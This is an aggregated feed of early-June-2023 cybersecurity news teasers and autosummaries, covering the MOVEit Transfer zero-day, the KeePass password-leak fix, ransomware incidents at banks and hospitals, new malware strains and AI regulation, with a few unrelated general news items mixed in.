                Katie Boswell on AI security and women’s rise in cybersecurity

                ciber
                2023-06-05 https://www.helpnetsecurity.com/2023/06/05/katie-boswell-ai-security-podcast/

                Katie Boswell spent years on the front lines securing the most critical national infrastructure in energy and life sciences. Yet, earlier in her career, she was told that senior leadership was not for her if she planned on becoming a mother. Despite early gender-based criticism she persevered and now, her experience puts her in the ideal position to discuss reinforcing the security and resiliency of systems and infrastructure. She spoke with the Left to Our … More

                The post Katie Boswell on AI security and women’s rise in cybersecurity appeared first on Help Net Security.

                "

                Autosummary: Emphasizing the need for businesses that are new to AI to define specific frameworks to their needs, industry, ecosystem, and available tools, Katie continued, “NIST, for instance, has an AI risk management framework. As the EU begins demanding greater transparency into AI models, we plan to see a demand for more in-depth SBOM management to identify vulnerabilities between components, product lines, and business units, as well as understand how specific models are trained. Security professionals must collaborate with data scientists to better understand the diverging security concerns, privacy, identity, access management, and information protection. "


                9 free cybersecurity whitepapers you should read

                ciber
                2023-06-05 https://www.helpnetsecurity.com/2023/06/05/free-cybersecurity-whitepapers-you-should-read/

                In today’s rapidly evolving digital landscape, organizations face constant cyber threats that can compromise their sensitive data, disrupt operations, and damage their reputation. Staying informed about the latest cyberattacks and understanding effective protection methods is crucial. This list of free cybersecurity whitepapers that don’t require registration covers a wide range of common cyber risks (ransomware, DDoS attacks, social network account hijacking). It explores the possible risks that could originate from new technologies such as generative … More

                The post 9 free cybersecurity whitepapers you should read appeared first on Help Net Security.

                "

                Autosummary: These attacks deplete network, application, or system resources, leading to issues such as network slowdowns, application crashes, and server failures. This whitepaper from Offensive Security concentrates on optimal methods for nurturing internal cybersecurity talent within your technical teams, such as IT, information security, DevOps, or engineering. "


                Magento, WooCommerce, WordPress, and Shopify Exploited in Web Skimmer Attack

                exploits
                2023-06-05 https://thehackernews.com/2023/06/magento-woocommerce-wordpress-and.html
                Cybersecurity researchers have unearthed a new ongoing Magecart-style web skimmer campaign that’s designed to steal personally identifiable information (PII) and credit card data from e-commerce websites. A noteworthy aspect that sets it apart from other Magecart campaigns is that the hijacked sites further serve as "makeshift" command-and-control (C2) servers, using the cover to facilitate the "

                Autosummary: "Rather than using the attackers’ own C2 server to host malicious code, which may be flagged as a malicious domain, attackers hack into (using vulnerabilities or any other means at their disposal) a vulnerable, legitimate site, such as a small or medium-sized retail website, and stash their code within it," Akamai noted. "


                Brazilian Cybercriminals Using LOLBaS and CMD Scripts to Drain Bank Accounts

                financial latam ciber
                2023-06-05 https://thehackernews.com/2023/06/brazilian-cybercriminals-using-lolbas.html
                An unknown cybercrime threat actor has been observed targeting Spanish- and Portuguese-speaking victims to compromise online banking accounts in Mexico, Peru, and Portugal. "This threat actor employs tactics such as LOLBaS (living-off-the-land binaries and scripts), along with CMD-based scripts to carry out its malicious activities," the BlackBerry Research and Intelligence Team said in a report "

                Autosummary: "This threat actor employs tactics such as LOLBaS (living-off-the-land binaries and scripts), along with CMD-based scripts to carry out its malicious activities," the BlackBerry Research and Intelligence Team said in a report published last week. "


                Governments worldwide grapple with regulation to rein in AI dangers

                government
                2023-06-05 https://www.computerworld.com/article/3698191/governments-worldwide-grapple-with-regulation-to-rein-in-ai-dangers.html#tk.rss_security

                Ever since generative AI exploded into public consciousness with the launch of ChatGPT at the end of last year, calls to regulate the technology to stop it from causing undue harm have risen to fever pitch around the world. The stakes are high — just last week, technology leaders signed an open public letter saying that if government officials get it wrong, the consequence could be the extinction of the human race.

                "

                Autosummary: Countries make their own regulations “[When it comes to] tech issues, even though every country is free to make its own rules, in the past what we have seen is there’s been some form of harmonization between the US, EU, and most Western countries,” said Sophie Goossens, a partner at law firm Reed Smith who specializes in AI, copyright, and IP issues. Differing approaches to regulation All regulation reflects the politics, ethics, and culture of the society you’re in, said Martha Bennett, vice president and principal analyst at Forrester, noting that in the US, for instance, there’s an instinctive reluctance to regulate unless there is tremendous pressure to do so, whereas in Europe there is a much stronger culture of regulation for the common good. “If we refer back to most technological advancements, such as the internet or artificial intelligence, it’s like a double-edged sword, as you can use it for both lawful and unlawful purposes,” said Felipe Romero Moreno, a principal lecturer at the University of Hertfordshire’s Law School whose work focuses on legal issues and regulation of emerging technologies, including AI.The draft legislation includes requirements for generative AI models to reasonably mitigate against foreseeable risks to health, safety, fundamental rights, the environment, democracy, and the rule of law, with the involvement of independent experts. "


                Spanish bank Globalcaja confirms Play ransomware attack

                financial exploits ransomware
                2023-06-05 https://securityaffairs.com/147073/cyber-crime/globalcaja-confirms-play-ransomware-attack.html

                Play ransomware group claims responsibility for a ransomware attack that hit Globalcaja, one of the major banks in Spain. Globalcaja is a financial institution in the autonomous community of Castilla-La Mancha; it has more than 300 offices across Spain and provides banking services to more than half a million clients. Globalcaja was the victim of […]

                The post Spanish bank Globalcaja confirms Play ransomware attack appeared first on Security Affairs.

                "



                KeePass v2.54 fixes bug that leaked cleartext master password

                exploits
                2023-06-05 https://www.bleepingcomputer.com/news/security/keepass-v254-fixes-bug-that-leaked-cleartext-master-password/
                KeePass has released version 2.54, fixing the CVE-2023-32784 vulnerability that allows the extraction of the cleartext master password from the application’s memory. [...] "

                Autosummary: "For example, when "Password" is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d." "


                Microsoft links Clop ransomware gang to MOVEit data-theft attacks

                exploits ransomware
                2023-06-05 https://www.bleepingcomputer.com/news/security/microsoft-links-clop-ransomware-gang-to-moveit-data-theft-attacks/
                Microsoft has linked the Clop ransomware gang to recent attacks exploiting a zero-day vulnerability in the MOVEit Transfer platform to steal data from organizations. [...] "

                Autosummary: "Microsoft is attributing attacks exploiting the CVE-2023-34362 MOVEit Transfer 0-day vulnerability to Lace Tempest, known for ransomware operations & running the Clop extortion site," the Microsoft Threat Intelligence team tweeted Sunday night. "


                MOVEit Transfer zero-day was exploited by Cl0p gang (CVE-2023-34362)

                exploits
                2023-06-05 https://www.helpnetsecurity.com/2023/06/05/cve-2023-34362-exploited/

                The zero-day vulnerability attackers have exploited to compromise vulnerable Progress Software’s MOVEit Transfer installations finally has an identification number: CVE-2023-34362. Based on information shared by Mandiant, Rapid7 and other security researchers, the attackers seem to have opportunistically targeted as many exposed organizations as possible, including US government agencies and banks. Microsoft is attributing the initial attacks to the Cl0p ransomware group (aka FIN11, or Lace Tempest – according to its new threat actor taxonomy). Mandiant … More

                The post MOVEit Transfer zero-day was exploited by Cl0p gang (CVE-2023-34362) appeared first on Help Net Security.

                "

                Autosummary: “The malware authenticates incoming connections via a hard-coded password and can run commands that will download files from the MOVEit Transfer system, extract its Azure system settings, retrieve detailed record information, create and insert a particular user, or delete this same user. "


                Microsoft: Lace Tempest Hackers Behind Active Exploitation of MOVEit Transfer App

                exploits
                2023-06-05 https://thehackernews.com/2023/06/microsoft-lace-tempest-hackers-behind.html
                Microsoft has officially linked the ongoing active exploitation of a critical flaw in the Progress Software MOVEit Transfer application to a threat actor it tracks as Lace Tempest. "Exploitation is often followed by deployment of a web shell with data exfiltration capabilities," the Microsoft Threat Intelligence team said in a series of tweets today. "CVE-2023-34362 allows attackers to "



                Idaho Hospitals hit by a cyberattack that impacted their operations

                ciber
                2023-06-05 https://securityaffairs.com/147089/cyber-crime/idaho-hospitals-cyber-attacks.html

                Last week two eastern Idaho hospitals and their clinics were hit by a cyberattack that temporarily impacted their operations. Last week the Idaho Falls Community Hospital was hit by a cyber attack that impacted its operations. Officials at the hospital confirmed that some clinics closed due to the cyber attack and some ambulances have been […]

                The post Idaho Hospitals hit by a cyberattack that impacted their operations appeared first on Security Affairs.

                "



                SpinOk Android malware found in more apps with 30 million installs

                exploits
                2023-06-05 https://www.bleepingcomputer.com/news/security/spinok-android-malware-found-in-more-apps-with-30-million-installs/
                The SpinOk malware was found in a new batch of Android apps on Google Play, reportedly installed an additional 30 million times. [...] "

                Autosummary: Other popular apps using the SpinOk SDK and which remain available for download via Google Play are:

                • Macaron Match (XM Studio) – 1 million downloads
                • Macaron Boom (XM Studio) – 1 million downloads
                • Jelly Connect (Bling Game) – 1 million downloads
                • Tiler Master (Zhinuo Technology) – 1 million downloads
                • Crazy Magic Ball (XM Studio) – 1 million downloads
                • Happy 2048 (Zhinuo Technology) – 1 million downloads
                • Mega Win Slots (Jia22) – 500,000 downloads

                CloudSEK reports that the collective download count for the additional SpinOK-ridden apps reaches over 30,000,000. "


                BBC staffers warned of payroll data breach. Other firms also affected by MOVEit vulnerability

                financial exploits
                2023-06-05 https://grahamcluley.com/bbc-staffers-warned-of-payroll-data-breach-other-firms-affected-by-moveit-vulnerability/
                Staff at the BBC have been warned that their personal data may now be in the hands of cybercriminals, following the exploitation of a vulnerability in a software tool used by the company that manages their payroll. "

                Autosummary: It’s important to recognise that blaming the BBC, Boots, British Airways, IBM, or even Zellis for this data breach is a case of shooting the messenger – rather than those where the fault really lies. "


                KeePass fixed the bug that allows the extraction of the cleartext master password

                exploits
                2023-06-05 https://securityaffairs.com/147109/security/keepass-fixed-the-bug-that-allows-the-extraction-of-the-cleartext-master-password.html

                KeePass addressed the CVE-2023-32784 bug that allows the extraction of the cleartext master password from the memory of the client. KeePass has addressed the CVE-2023-32784 vulnerability, which allowed the retrieval of the clear-text master password from the client’s memory. KeePass is a free and open-source software used to securely manage passwords. It functions as a […]

                The post KeePass fixed the bug that allows the extraction of the cleartext master password appeared first on Security Affairs.

                "



                Microsoft blames Clop ransomware gang for ‘MOVEit Transfer’ attacks

                exploits ransomware
                2023-06-05 https://securityaffairs.com/147093/hacking/clop-ransomware-moveit-transfer.html

                Microsoft attributes the recent campaign exploiting a zero-day in the MOVEit Transfer platform to the Clop ransomware gang. The Clop ransomware gang (aka Lace Tempest) is credited by Microsoft for the recent campaign that exploits a zero-day vulnerability, tracked as CVE-2023-34362, in the MOVEit Transfer platform. Microsoft is attributing attacks exploiting the CVE-2023-34362 MOVEit Transfer […]

                The post Microsoft blames Clop ransomware gang for ‘MOVEit Transfer’ attacks appeared first on Security Affairs.

                "



                Clop ransomware claims responsibility for MOVEit extortion attacks

                exploits ransomware
                2023-06-05 https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-moveit-extortion-attacks/
                The Clop ransomware gang has told BleepingComputer they are behind the MOVEit Transfer data-theft attacks, where a zero-day vulnerability was exploited to breach multiple companies’ servers and steal data. [...] "

                Autosummary: "I want to tell you right away that the military, children’s hospitals, GOV etc like this we no to attack, and their data was erased," Clop said in their email to BleepingComputer. "


                New tool scans iPhones for "Triangulation" malware infection

                exploits
                2023-06-05 https://www.bleepingcomputer.com/news/security/new-tool-scans-iphones-for-triangulation-malware-infection/
                Cybersecurity firm Kaspersky has released a tool to detect if Apple iPhones and other iOS devices are infected with a new "Triangulation" malware. [...] "

                Autosummary: Python package: get "triangle_check" from PyPI using the following command:

                python -m pip install triangle_check

                Alternatively, the tool can be built from GitHub by running:

                git clone https://github.com/KasperskyLab/triangle_check
                cd triangle_check
                python -m build
                python -m pip install dist/triangle_check-1.0-py3-none-any.whl

                After that, use this command to launch the tool, passing the path to the created backup:

                python -m triangle_check <path to the created backup>

                Creating an iOS backup through iTunes (Kaspersky). macOS: connect your device to the computer and, if needed, confirm that you trust the computer. When launched and pointed to the iOS backup path, the triangle_check tool will output one of the following scan results: DETECTED: the "Operation Triangulation" malware has infected the device beyond doubt. "


                Play ransomware gang compromises Spanish bank, threatens to leak files

                financial exploits ransomware
                2023-06-05 https://www.malwarebytes.com/blog/news/2023/06/play-ransomware-gang-compromises-spanish-bank-threatens-to-leak-files

                Categories: Business

                Tags: globalcaja

                Tags: play ransomware

                Tags: compromise

                Tags: data

                Tags: leak

                Tags: ransom

                Tags: bank

                Tags: banking

                Tags: Spain

                Tags: Spanish

                A large Spanish bank, Globalcaja, has fallen victim to the Play ransomware gang.

                (Read more...)

                The post Play ransomware gang compromises Spanish bank, threatens to leak files appeared first on Malwarebytes Labs.

                "

                Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. From the outset, in #Globalcaja we activated the security protocol created for this purpose, which led us, out of prudence, to disable some office posts, temporarily limiting the performance of some operations. It has not affected the entity’s transactional systems (neither customers’ accounts nor their agreements are… — Globalcaja (@SomosGlobalcaja) June 2, 2023. Yesterday, we registered a cyber incident, consisting of a computer attack on some local computers through a type of #ransomware virus. "


                The 2023 State of Ransomware in Education: 84% increase in attacks over 6-month period

                exploits government ransomware
                2023-06-05 https://www.malwarebytes.com/blog/threat-intelligence/2023/06/the-2023-state-of-ransomware-in-education-84-increase-in-known-attacks-over-6-month-period

                Categories: Threat Intelligence

                In total, 26 separate ransomware-as-a-service gangs contributed to the onslaught on education.

                (Read more...)

                The post The 2023 State of Ransomware in Education: 84% increase in attacks over 6-month period appeared first on Malwarebytes Labs.

                "

                Autosummary: USA education ransomware attacks by gang, June 2022-May 2023. Global education ransomware attacks by gang, June 2022-May 2023. Looking Ahead. To recap, our key findings include: A significant increase in attacks: the education sector experienced a steep rise in ransomware attacks, with an 84% increase observed over a 6-month period. Distribution of Vice Society attacks vs other ransomware gangs, June 2022-May 2023. Further findings from the data show that, while ransomware attacks against education are a global phenomenon, the USA (with 56% of known attacks) and the UK (with 15%) were the most frequently attacked countries between June 2022 and May 2023. Known attacks on education by country, June 2022-May 2023. The United Kingdom followed distantly with 28 known attacks, while other countries like Canada, Germany, Brazil, and others also fell prey to these cybercriminals. "


                5 unusual cybersecurity tips that actually work

                ciber
                2023-06-05 https://www.malwarebytes.com/blog/personal/2023/06/5-unusual-cybersecurity-tips-that-actually-work

                Categories: Personal

                It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.

                (Read more...)

                The post 5 unusual cybersecurity tips that actually work appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: June 5, 2023. Stop thinking you’re special: everyone is a star in their own story, so when we unexpectedly get a message from a lonely young Russian lady who’s recently moved to our town, a Nigerian Prince promises us riches, "Keanu Reeves" follows us on Instagram, or we stumble upon the crypto-opportunity of a lifetime, our exceptionalism can kick in. So, you’re on top of your software updates, you use a password manager, you’ve enabled two-factor authentication wherever you can, you’ve got BrowserGuard installed, and you’re running Malwarebytes Premium. "


                Week in review: MOVEit Transfer critical zero-day vulnerability, Kali Linux 2023.2 released

                exploits
                2023-06-04 https://www.helpnetsecurity.com/2023/06/04/week-in-review-moveit-transfer-critical-zero-day-vulnerability-kali-linux-2023-2-released/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MOVEit Transfer zero-day attacks: The latest info Progress Software has updated the security advisory and confirmed that the vulnerability (still without a CVE number) is a SQL injection vulnerability in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer’s database. Penetration tester develops AWS-based automated cracking rig Building a custom cracking … More

                The post Week in review: MOVEit Transfer critical zero-day vulnerability, Kali Linux 2023.2 released appeared first on Help Net Security.

                Autosummary: Infosec products of the month: May 2023 Here’s a look at the most interesting products from the past month, featuring releases from: Aqua Security, Axiado, Bitwarden, Cloudflare, ComplyAdvantage, Dashlane, Delinea, Enzoic, Feedzai, Immersive Labs, Intruder, Nebulon, NETSCOUT, Neurotechnology, Nozomi Networks, OpenVPN, Private AI, Radware, Satori, Trua, Vanta, Veriff, and Veza. New infosec products of the week: June 2, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Bitdefender, ConnectSecure, CYTRACOM, Permit.io, and PingSafe.


                CISA orders govt agencies to patch MOVEit bug used for data theft

                exploits
                2023-06-04 https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-patch-moveit-bug-used-for-data-theft/
                CISA has added an actively exploited security bug in the Progress MOVEit Transfer managed file transfer (MFT) solution to its list of known exploited vulnerabilities, warning U.S. federal agencies to patch their systems by June 23. [...]

                Autosummary: Nevertheless, the method of exploitation bears a remarkable resemblance to previous instances, including the zero-day exploitation of Accellion FTA servers in December 2020 and the mass exploitation of a GoAnywhere MFT zero-day in January 2023.


                New Linux Ransomware Strain BlackSuit Shows Striking Similarities to Royal

                exploits ransomware
                2023-06-03 https://thehackernews.com/2023/06/new-linux-ransomware-strain-blacksuit.html
                An analysis of the Linux variant of a new ransomware strain called BlackSuit has uncovered significant similarities with another ransomware family called Royal. Trend Micro, which examined an x64 VMware ESXi version targeting Linux machines, said it identified an "extremely high degree of similarity" between Royal and BlackSuit. "In fact, they're nearly identical, with 98% similarities in

                Autosummary: "In fact, they're nearly identical, with 98% similarities in functions, 99.5% similarities in blocks, and 98.9% similarities in jumps based on BinDiff, a comparison tool for binary files," Trend Micro researchers noted.


                Cloud Security Tops Concerns for Cybersecurity Leaders: EC-Council's Certified CISO Hall of Fame Report 2023

                government ciber
                2023-06-03 https://thehackernews.com/2023/06/cloud-security-tops-concerns-for.html
                A survey of global cybersecurity leaders through the 2023 Certified CISO Hall of Fame Report commissioned by the EC-Council identified 4 primary areas of grave concern: cloud security, data security, security governance, and lack of cybersecurity talent. EC-Council, the global leader in cybersecurity education and training, released its Certified Chief Information Security Officer Hall of Fame

                Autosummary: Additional challenges identified in the report include third-party/vendor security management, network security, application security, endpoint security, rapid IT changes, business growth and expansion of hybrid work models, and an inadequate focus on cyber risk management. A truly global organization with a driving belief in bringing diversity, equity and inclusion to the modern cybersecurity workforce, EC-Council maintains 11 offices in the U.S., the UK, India, Malaysia, Singapore, and Indonesia.


                New Linux Ransomware BlackSuit is similar to Royal ransomware

                exploits ransomware
                2023-06-03 https://securityaffairs.com/147002/cyber-crime/blacksuit-similar-royal-ransomware.html

                Experts noticed that the new Linux ransomware BlackSuit has significant similarities with the Royal ransomware family. Royal ransomware is one of the most notable ransomware families of 2022; it made the headlines in early May 2023 with the attack against the IT systems in Dallas, Texas. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has […]

                The post New Linux Ransomware BlackSuit is similar to Royal ransomware appeared first on Security Affairs.

                Autosummary: The ransomware encrypts the network shares found on the local network, and the local drives, with the AES algorithm. In early May, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations with tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family.


                Online sellers targeted by new information-stealing malware campaign

                exploits
                2023-06-03 https://www.bleepingcomputer.com/news/security/online-sellers-targeted-by-new-information-stealing-malware-campaign/
                Online sellers are targeted in a new campaign to push the Vidar information-stealing malware, allowing threat actors to steal credentials for more damaging attacks. [...]

                Autosummary: Domains believed to be associated with this campaign are listed in the source article. If the site displays the bank statement, it shows a sample bank statement from Commerce Bank that uses example data, such as the customer name "Jane Customer" at "Anywhere Dr." Phishing email pushing fake bank statement (Source: BleepingComputer). However, other tests would display a fake Google Drive page that says a preview is unavailable and prompts the user to download the "Bank_statement.pdf". Vidar is an information-stealing trojan that can steal browser cookies, browser history, saved passwords, cryptocurrency wallets, text files, Authy 2FA databases, and screenshots of the active Windows screen.


                River Plate: Football game is abandoned in Argentina after fan falls from stand

                latam
                2023-06-03 https://www.bbc.co.uk/sport/football/65799090?at_medium=RSS&at_campaign=KARANGA
                A top-flight match in Argentina is abandoned after a fan falls to their death from a stand at the stadium.



                Brics ministers call for rebalancing of global order away from West

                industry
                2023-06-02 https://www.bbc.co.uk/news/world-africa-65784030?at_medium=RSS&at_campaign=KARANGA
                The talks attended by Russia in South Africa are clouded by allegations of war crimes in Ukraine.



                How defense contractors can move from cybersecurity to cyber resilience

                ciber
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/defense-contractors-effectiveness-cybersecurity/

                As the world’s most powerful military and economic power, the United States also holds another, less impressive distinction: Cyber threat actors target the US more than any other country in the world. In 2022 alone, the FBI received more than 800,000 cybercrime-related complaints, with losses totaling over $10 billion, according to the agency’s latest Internet Crime Complaint Center (IC3) report — a leap of $3.4 billion from the previous year. As cybercriminals grow in sophistication, … More

                The post How defense contractors can move from cybersecurity to cyber resilience appeared first on Help Net Security.

                Autosummary: In 2022 alone, the FBI received more than 800,000 cybercrime-related complaints, with losses totaling over $10 billion, according to the agency’s latest Internet Crime Complaint Center (IC3) report — a leap of $3.4 billion from the previous year. According to the World Economic Forum’s 2023 Global Cybersecurity Outlook, 86% of business leaders and an even higher percentage of cyber leaders, 93%, believe a catastrophic cyber event is likely in the next two years due to global geopolitical instability.


                Introducing the book: Cybersecurity First Principles

                ciber
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/introducing-the-book-cybersecurity-first-principles/

                In this Help Net Security video interview, Rick Howard, CSO of N2K, Chief Analyst, and Senior Fellow at the Cyberwire, discusses his book – Cybersecurity First Principles: A Reboot of Strategy and Tactics. In the book, Howard challenges the conventional wisdom of current cybersecurity best practices, strategy, and tactics and makes the case that the profession needs to return to first principles. He lays out the arguments for the absolute cybersecurity first principle and then … More

                The post Introducing the book: Cybersecurity First Principles appeared first on Help Net Security.



                Cybercriminals use legitimate websites to obfuscate malicious payloads

                ciber
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/evolving-attack-methodologies/

                According to Egress, the evolving attack methodologies currently used by cybercriminals are designed to get through traditional perimeter security. “The evolution of phishing emails continues to pose a major threat to organizations, emphasizing the need to enhance defenses to prevent attacks,” said Jack Chapman, VP of Threat Intelligence, Egress. “Although traditional signature-based detection can filter out phishing emails with known malicious payloads (attachments and links), cybercriminals are constantly refining their attack methods to bypass existing … More

                The post Cybercriminals use legitimate websites to obfuscate malicious payloads appeared first on Help Net Security.

                Autosummary: Amongst the sites leveraged by hackers and detected by Egress Defend, YouTube, Amazon AWS, Google Docs, Firebase Storage, and DocuSign emerged among the top 10 most frequently used, with a 121% rise in this method observed between January 1 and April 30, 2023, compared to September to December 2022.


                North Korea's Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks

                industry
                2023-06-02 https://thehackernews.com/2023/06/north-koreas-kimsuky-group-mimics-key.html
                U.S. and South Korean intelligence agencies have issued a new alert warning of North Korean cyber actors' use of social engineering tactics to strike think tanks, academia, and news media sectors. The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (

                Autosummary: The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima.


                MOVEit Transfer Under Attack: Zero-Day Vulnerability Actively Being Exploited

                exploits
                2023-06-02 https://thehackernews.com/2023/06/moveit-transfer-under-attack-zero-day.html
                A critical flaw in Progress Software's MOVEit Transfer managed file transfer application has come under widespread exploitation in the wild to take over vulnerable systems. The shortcoming, which is yet to be assigned a CVE identifier, relates to a severe SQL injection vulnerability that could lead to escalated privileges and potential unauthorized access to the environment. "An SQL injection

                Autosummary: Patches for the bug have been made available by the Massachusetts-based company, which also owns Telerik, in the following versions: 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1).


                iPhone in India: Foxconn to manufacture smartphones in Karnataka by April 2024

                industry
                2023-06-02 https://www.bbc.co.uk/news/world-asia-india-65784719?at_medium=RSS&at_campaign=KARANGA
                Apple's decision to manufacture iPhones in India aims at diversifying away from China



                MOVEit Transfer zero-day attacks: The latest info

                exploits
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/moveit-transfer-zero-day-attacks/

                There’s new information about the zero-day vulnerability in Progress Software’s MOVEit Transfer solution exploited by attackers and – more importantly – patches and helpful instructions for customers. The MOVEit Transfer zero-day and updated mitigation and remediation advice Progress Software has updated the security advisory and confirmed that the vulnerability (still without a CVE number) is a SQL injection vulnerability in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access … More

                The post MOVEit Transfer zero-day attacks: The latest info appeared first on Help Net Security.

                Autosummary: The advisory also contains links to fixed versions, indicators of compromise (IoCs) – scripts, webshells, C2 IP addresses, user accounts – and more extensive clean-up advice, which includes: disabling all HTTP and HTTPS traffic to the MOVEit Transfer environment; deleting unauthorized files and user accounts and resetting credentials; applying the patch/updating the installation to a fixed version; enabling all HTTP and HTTPS traffic to the MOVEit Transfer environment; and checking that the files have been successfully deleted and no unauthorized accounts remain – if they haven’t been, do the clean-up and reset the service account credentials again. If the clean-up has been successful, organizations should monitor network, endpoints, and logs for IoCs. Researchers from Huntress, TrustedSec, and Rapid7 have analyzed the webshell/backdoor, released YARA signatures and SIGMA rules defenders can use to detect IoCs and hunt for suspicious files, and have shared more technical information about the attacks.


                Qakbot: The trojan that just won’t go away

                exploits
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/qakbot-qbot/

                Qakbot (aka Qbot) – banking malware-turned-malware/ransomware distribution network – was first observed in 2007 and is active to this day. The never-ending adaptability of this threat is key to its long-term survival and success. “Qakbot operators tend to reduce or stop their spamming attacks for long periods of time on a seasonal basis, returning to activity with a modified suite of tools,” Chris Formosa and Steve Rudd, researchers with Lumen’s Black Lotus Labs, have … More

                The post Qakbot: The trojan that just won’t go away appeared first on Help Net Security.



                Digi International updates SkyCloud features for industrial monitoring and control solutions

                industry
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/digi-skycloud/

                Digi International has released the latest version of Digi SkyCloud, a solution for monitoring, analyzing and controlling field data. The 23.5 update of SkyCloud introduces a range of new features, giving users effortless systems integrations with remote monitoring and control solutions — delivering flexibility and optimal efficiency, making it ideal for industrial, agricultural and environmental industries. Company administrators can now better manage their deployment and user base. At the forefront of this release are the … More

                The post Digi International updates SkyCloud features for industrial monitoring and control solutions appeared first on Help Net Security.



                Google triples reward for Chrome full chain exploits

                exploits
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/chrome-full-chain-exploit/

                Google has tripled the full reward amount for the first security bug report that includes a functional full chain exploit of its popular Chrome browser. Six months of higher rewards for a Chrome full chain exploit The Chrome Vulnerability Rewards Program, which started on June 1, is set to run until December 1, 2023. During this period, bug hunters who report security bugs that can be chained together to fully exploit Chrome can get up … More

                The post Google triples reward for Chrome full chain exploits appeared first on Help Net Security.



                Galvanick raises $10 million for its industrial cybersecurity platform

                industry ciber
                2023-06-02 https://www.helpnetsecurity.com/2023/06/02/galvanick-seed-round/

                Galvanick announced its $10 million seed round. Major investors included MaC Venture Capital, Founders Fund, Village Global, Countdown Capital, Hanover Technology Investment Management, Shrug Capital, 8090 Industries, and over 25 angel investors specializing in cybersecurity, manufacturing, finance, and defense. Galvanick plans to use the capital to make additional core hires, and expand use of its initial product – an Extended Detection & Response (XDR) platform – to additional advanced manufacturing and critical infrastructure facilities. Galvanick … More

                The post Galvanick raises $10 million for its industrial cybersecurity platform appeared first on Help Net Security.



                New Botnet Malware "Horabot" Targets Spanish-Speaking Users in Latin America

                exploits
                2023-06-02 https://thehackernews.com/2023/06/new-botnet-malware-horabot-targets.html
                Spanish-speaking users in Latin America have been at the receiving end of a new botnet malware dubbed Horabot since at least November 2020. "Horabot enables the threat actor to control the victim's Outlook mailbox, exfiltrate contacts' email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim's mailbox," Cisco Talos researcher Chetan Raghuprasad

                Autosummary: The cybersecurity firm said a majority of the infections are located in Mexico, with limited victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama.


                MOVEit Transfer software zero-day actively exploited in the wild

                exploits
                2023-06-02 https://securityaffairs.com/146963/hacking/moveit-transfer-zero-day.html

                Threat actors are exploiting a zero-day flaw in Progress Software’s MOVEit Transfer product to steal data from organizations. Threat actors are actively exploiting a zero-day vulnerability in the Progress MOVEit Transfer file transfer product to steal data from organizations. MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files […]

                The post MOVEit Transfer software zero-day actively exploited in the wild appeared first on Security Affairs.

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, MOVEit Transfer)


                Burton Snowboards discloses data breach after February attack

                financial
                2023-06-02 https://www.bleepingcomputer.com/news/security/burton-snowboards-discloses-data-breach-after-february-attack/
                Leading snowboard maker Burton Snowboards confirmed it notified customers of a data breach after some of their sensitive information was "potentially" accessed or stolen during what the company described in February as a "cyber incident." [...]

                Autosummary: While its headquarters are in Burlington, Vermont, Burton also maintains offices in various locations, including Australia, Austria, Canada, California, China, and Japan.


                Point32Health ransomware attack exposed info of 2.5M people

                exploits ransomware
                2023-06-02 https://securityaffairs.com/146975/data-breach/point32health-ransomware-attack-2.html

                After the recent ransomware attack, Point32Health disclosed a data breach that impacted 2.5 million Harvard Pilgrim Health Care subscribers. In April, the non-profit health insurer Point32Health took systems offline in response to a ransomware attack that took place on April 17. The insurer immediately launched an investigation into the incident with the help of third-party […]

                The post Point32Health ransomware attack exposed info of 2.5M people appeared first on Security Affairs.

                Autosummary: Stolen data include names, addresses, phone numbers, birth dates, Social Security numbers, health insurance account information, taxpayer identification numbers, and clinical information, including medical history, diagnoses, and treatment details.


                The Week in Ransomware - June 2nd 2023 - Whodunit?

                exploits ransomware
                2023-06-02 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-2nd-2023-whodunit/
                It has been a fairly quiet week regarding ransomware, with only a few reports released and no new significant attacks. However, we may have a rebrand in the making, and a ransomware operation is likely behind a new zero-day data-theft campaign, so we have some news to talk about. [...]

                Autosummary: Contributors this week include @Seifreed, @billtoulas, @Ionut_Ilascu, @struppigel, @BleepinComputer, @serghei, @LawrenceAbrams, @malwrhunterteam, @demonslay335, @fwosar, @rapid7, @HuntressLabs, @GossiTheDog, @IBMSecurity, @TrendMicro, @Avast, @jgreigj, and @pcrisk. May 30th 2023: BlackCat ransomware, which was among the top ransomware families observed by IBM Security X-Force in 2022, according to the 2023 X-Force Threat Intelligence Index, continues to wreak havoc across organizations globally this year.


